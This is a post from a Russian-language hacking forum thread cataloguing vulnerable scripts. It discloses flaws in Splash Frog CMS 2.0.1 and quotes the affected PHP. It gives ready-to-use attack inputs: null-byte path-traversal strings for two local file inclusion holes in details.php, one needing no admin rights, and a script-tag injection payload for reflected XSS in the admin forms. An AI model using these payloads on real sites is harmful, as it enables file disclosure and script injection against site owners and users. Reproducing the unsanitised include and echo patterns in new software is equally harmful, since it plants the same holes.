Энциклопедия уязвимых скриптов

#11

09.12.2009, 00:56

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

С нами: 9223466

Репутация: 3171

Product: Splash Frog CMS
Author: http://www.twinleafstudios.net/
Version: 2.0.1

LFI

file: details.php
/*треуються права админа*/

PHP код:


		
			
function main_content() {

    if(empty($_GET['sec']))

    { header("Location: main.php"); exit; }



    if(!empty($_SESSION['SplashFrog_ViewSite'])) {

        if(($_SESSION['SplashFrog_SiteAdmin'] != '1') && (!in_array($_SESSION['SplashFrog_ViewSite'], $_SESSION['SplashFrog_SiteID'])))

        { echo '<p class="error">You do not have permission to view this site.</p>'; return; }

    }

    

    if(file_exists("section/".$_GET['sec'].".php"))

    { include_once("section/".$_GET['sec'].".php"); }

    else

    { echo '<p class="error">Unable to access the selected section.</p>'; }

}

PHP код:


		
			
    <?php if(function_exists(main_content)) { echo main_content(); } ?>

target: ?sec=../../../file.php%00

/*без прав админа*/
file: details.php

PHP код:


		
			
function main_submenu() {

    if(file_exists("submenu/".$_GET['sec'].".php"))

    { include_once("submenu/".$_GET['sec'].".php"); }

}

Вызываеться в файле:

file: /template/tmpl2.php

PHP код:


		
			
<?php if(function_exists(main_submenu)) { echo main_submenu(); } ?>

target: ?sec=../../../file.php$00

XSS

В папке /forms/ уязвим почти каждый файл.пример:

file: /forms/admin/admin.php

PHP код:


		
			
<input type="hidden" name="adminID" value="<?=$_POST['adminID'];?>" />

    <input type="hidden" name="curUsername" id="curUsername" value="<?=$_POST['username'];?>" />

    <input type="hidden" name="curEmail" id="curEmail" value="<?=$_POST['email'];?>" />

target: {POST} ?username="><script>alert('hacker');</script>